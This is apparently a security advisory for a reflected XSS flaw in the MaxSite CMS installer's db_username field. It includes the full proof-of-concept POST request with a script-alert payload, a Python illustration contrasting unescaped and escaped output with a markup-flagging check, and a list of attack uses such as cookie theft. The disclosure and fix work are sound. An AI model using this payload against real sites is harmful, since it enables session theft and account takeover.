Cross-site Scripting (XSS) - Generic in maxsite/cms
Mar 25th 2021
Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.
🕵️‍♂️ Proof of Concept
While setting up MaxSite CMS, the installer requires us to fill in database info, and the db_username value is reflected on the page. If we put <script>alert(1)</script> in that field and submit the form, we get the popup. Here's the HTTP request:

POST /cms-1/install/ HTTP/1.1
Host: localhost
User-Agent: BadBoy17
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
Origin: http://localhost
Connection: close
Referer: http://localhost/cms-1/install/
Upgrade-Insecure-Requests: 1

username=hack&password=1234&email=hack%40hack.io&site_name=Pwn&db_hostname=localhost&db_username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&db_password=root&db_database=max&db_dbprefix=mso_
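As an added illustration (not MaxSite's own code), the following Python decodes the request body from the PoC above, renders the db_username field the unescaped way the report describes beside an HTML-escaped rendering of the same field, and flags submitted fields that carry markup so a defender can log them; the installer template strings are hypothetical stand-ins for whatever MaxSite actually echoes.

```python
# Added example, not code from MaxSite CMS. Models the reflected-XSS
# defect in the installer and the output-encoding fix for it.
from html import escape
from urllib.parse import parse_qs

# Form body copied from the PoC request above (constructed sample).
POC_BODY = ("username=hack&password=1234&email=hack%40hack.io&site_name=Pwn"
            "&db_hostname=localhost"
            "&db_username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
            "&db_password=root&db_database=max&db_dbprefix=mso_")

# Hypothetical installer template: the report only says the value is
# reflected, so a plain text-context echo is assumed here.
TEMPLATE = "<p>Connecting to MySQL as {user}</p>"


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into name -> value."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(fields: dict) -> str:
    """Echo the raw submitted value into HTML (the reported behaviour)."""
    return TEMPLATE.format(user=fields.get("db_username", ""))


def render_fixed(fields: dict) -> str:
    """Same template with HTML escaping applied at the point of output.
    quote=True also covers attribute contexts delimited by ' or "."""
    return TEMPLATE.format(user=escape(fields.get("db_username", ""), quote=True))


def reflects_raw_markup(html: str) -> bool:
    """Check used in tests: did an unescaped tag survive into the page?"""
    return "<script" in html.lower()


def suspicious_fields(fields: dict) -> list:
    """Names of fields whose decoded value contains HTML tag characters;
    useful as a logging/alerting hook, not as a substitute for escaping."""
    return sorted(name for name, value in fields.items()
                  if "<" in value or ">" in value)


if __name__ == "__main__":
    form = parse_form(POC_BODY)
    print("vulnerable:", render_vulnerable(form))
    print("fixed:     ", render_fixed(form))
    print("flagged:   ", suspicious_fields(form))
```

Escaping at output time is the fix; the field filter only tells you an attempt happened and must not be relied on to block it.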
With the help of XSS, an attacker can perform social engineering on users by redirecting them from the real website to a fake one. An attacker can steal their cookies, leading to account takeover, or download malware onto their system, and there are many more attack scenarios a skilled attacker can perform with XSS.